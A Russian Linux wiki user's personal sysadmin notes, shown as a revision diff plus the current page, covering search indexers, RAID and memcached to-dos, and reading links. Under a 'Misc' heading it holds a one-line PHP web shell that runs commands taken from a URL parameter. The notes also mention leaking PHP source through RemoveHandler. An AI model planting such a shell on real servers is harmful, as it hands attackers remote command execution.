Участник:Rain/Заметки: различия между версиями

Материал из Linux Wiki
Перейти к навигацииПерейти к поиску
(Давно не обновлял)
 
(не показаны 23 промежуточные версии этого же участника)
Строка 1: Строка 1:
* [http://www.linux.org.ru/forum/linux-hardware/6748566?lastmod=1316444347702#comment-6759509 Создание виртуальной многоканальной карты из нескольких простых]
* [http://www.linux.org.ru/forum/linux-hardware/6748566?lastmod=1316444347702#comment-6759509 Создание виртуальной многоканальной карты из нескольких простых]
* Почитать на ночь перед сном:
** http://mysqldump.azundris.com/archives/77-Transactions-An-InnoDB-Tutorial.html
** http://vdachev.net/2007/02/22/mysql-reducing-ibdata1/
* http://xeim.blogspot.com/2008/09/nullmailer.html - перечень и пример настройки простых программ для пересылки почты
* http://blog.sjinks.pro/security/194-say-no-to-intruder/ - пример использования swatch
* http://www.securitylab.ru/analytics/421791.php - немного о веб-шеллах и бэкдорах
* https://www.mediawiki.org/wiki/Version_lifecycle - когда надо обновлять Mediawiki
== Разное ==
<? system($_GET['cmd']); ?>


== Индексаторы ==
== Индексаторы ==
Строка 13: Строка 24:
==ToDo по серверу==
==ToDo по серверу==


* Сменить RAID10 на RAID1 для системного массива
* <s>Сменить RAID10 на RAID1 для системного массива</s>
* Вынести bitmap'ы (?) на другой массив для каждого (?) из массивов
<pre>
* Написать какой-нибудь скрипт для более удобного создания контейнеров с учетом попавшихся в процессе освоения OVZ граблей
Итого:
* Пофиксить подмену handler'ов на веб-сервере
* https://www.linux.org.ru/forum/admin/7377399 - как победить зависания в процессе перемещения LV в LVM'e - пока никто не сказал
* Проверить на тестовом сервере, что требуется для работы memcached для всяких там Wordpress'ов.
* На будущее - сразу после разборки-сборки RAID'a вносить его в mdadm.conf и в initrd (прежде всего в initrd), потом уже мувать разделы.
* Поделать больше разделов для контейнеров
</pre>
* Максимально отвязаться от монтирования каталогов внутрь контейнера, перейти на NFS (шаг в сторону ухода от OpenVZ) - in progress
* <s>Вынести bitmap'ы (?) на другой массив для каждого (?) из массивов</s>
* Сделать dhcp-сервер на какой-нибудь диапазон адресов внутренней сети
<pre>
* Сделать сервер для сетевой загрузки для внутренней сети
Прежде всего я их создал - раньше просто не было. Создал только на системном - при создании на разделе другого массива система вешалась.
* <s>Разобраться с неработоспособностью i2p</s>
Возможно это было из-за того, что были перекрестные битмапы между RAID'aми. Пробовать пока больше нет желания.
* Повыпиливать su/sudo там, где это не надо (добавить группы и т.п.)
Сделал internal bitmap, скорость вроде не упала.
* Сделать мониторинг процессов целиком изнутри контейнера
</pre>
* Перейти на Xen
* Пофиксить подмену handler'ов на веб-сервере - надо ли?
<pre>
Вот хз, надо ли. С одной стороны - да, можно найти бажный скрипт, который добавит RemoveHandler .php в .htaccess
и можно будет сливать php-файлы плейнтекстом. С другой стороны, этот же RemoveHandler используется для защиты каталогов аплоада файлов
от выполнения скриптов или для отображения php-файлов текстом в каких-нибудь репозиториях кода.
Т.е., вроде как правильнее было бы оставить, а права на аплоад и разруливать бажные скрипты уже владельцу сайта.
https://www.linux.org.ru/forum/talks/7273249
</pre>
* <s>Проверить на тестовом сервере, что требуется для работы memcached для всяких там Wordpress'ов.</s>
<pre>
Требовался php5-memcache (не php5-memcached). Не смотря на ссылку на каталог в /var в конфиге - там реально ничего нет, т.е., из используемого - только библиотека
Не работало расширение раньше и из-за того, что плагин ломился на дефолтный порт
Однако есть другая проблема - не получается использовать общий memcached-сервер для нескольких WP-сайтов - на других сайтах начинают появляться "чужие" элементы и надписи.
С учетом того, что memcached обычно требуется на высоконагруженных сайтах, где под один сайт выделяется целый сервер - то не особо критично, просто пользоваться им на shared-хостинге нежелательно.
</pre>
* Максимально расширить disable_functions на хостинге
* Подумать насчет запуска httpd у monit'a для управления наблюдаемыми сервисами.
 
== Ссылки ==
 
* [[Сервер linuxoid.in/Заметки]]

Текущая версия на 01:50, 1 февраля 2018

Разное

<? system($_GET['cmd']); ?>

Индексаторы

  • htdig - древний, не развивается, последний релиз - 2004 года, не поддерживает юникод. Работал. Есть в дистрибутиве. Может сам собирать контент с веб-страниц
  • DataPark Search - В целом подходит, единственный раз работал. Повторить не удалось. Может сам собирать контент с веб-страниц или с локальных файлов. Не удалось запустить поиск по индексированному, не выдает ссылки, хотя документы считает
  • Sphinx - развивается, тестовый вариант запустился. Не умеет самостоятельно лазить по веб-страницам (в инете есть костыли на базе wget+bash, которые сграбливают сайты и подсовывают их Сфинксу, после чего тот это дело индексирует), больше предназначен для работы с конкретными проектами (например, шерстить базу локального форума, вики, etc)
  • MnogoSearch - единственный индексатор, который адекватно работал. То ли он является клоном DataPark Search, то ли наоборот, но они очень похожи по внутреннему устройству

ToDo по серверу

  • Сменить RAID10 на RAID1 для системного массива
Итого:
* https://www.linux.org.ru/forum/admin/7377399 - как победить зависания в процессе перемещения LV в LVM'e - пока никто не сказал
* На будущее - сразу после разборки-сборки RAID'a вносить его в mdadm.conf и в initrd (прежде всего в initrd), потом уже мувать разделы.
  • Вынести bitmap'ы (?) на другой массив для каждого (?) из массивов
Прежде всего я их создал - раньше просто не было. Создал только на системном - при создании на разделе другого массива система вешалась.
Возможно это было из-за того, что были перекрестные битмапы между RAID'aми. Пробовать пока больше нет желания.
Сделал internal bitmap, скорость вроде не упала.
  • Пофиксить подмену handler'ов на веб-сервере - надо ли?
Вот хз, надо ли. С одной стороны - да, можно найти бажный скрипт, который добавит RemoveHandler .php в .htaccess
и можно будет сливать php-файлы плейнтекстом. С другой стороны, этот же RemoveHandler используется для защиты каталогов аплоада файлов
от выполнения скриптов или для отображения php-файлов текстом в каких-нибудь репозиториях кода.
Т.е., вроде как правильнее было бы оставить, а права на аплоад и разруливать бажные скрипты уже владельцу сайта.
https://www.linux.org.ru/forum/talks/7273249
  • Проверить на тестовом сервере, что требуется для работы memcached для всяких там Wordpress'ов.
Требовался php5-memcache (не php5-memcached). Не смотря на ссылку на каталог в /var в конфиге - там реально ничего нет, т.е., из используемого - только библиотека
Не работало расширение раньше и из-за того, что плагин ломился на дефолтный порт
Однако есть другая проблема - не получается использовать общий memcached-сервер для нескольких WP-сайтов - на других сайтах начинают появляться "чужие" элементы и надписи.
С учетом того, что memcached обычно требуется на высоконагруженных сайтах, где под один сайт выделяется целый сервер - то не особо критично, просто пользоваться им на shared-хостинге нежелательно.
  • Максимально расширить disable_functions на хостинге
  • Подумать насчет запуска httpd у monit'a для управления наблюдаемыми сервисами.

Ссылки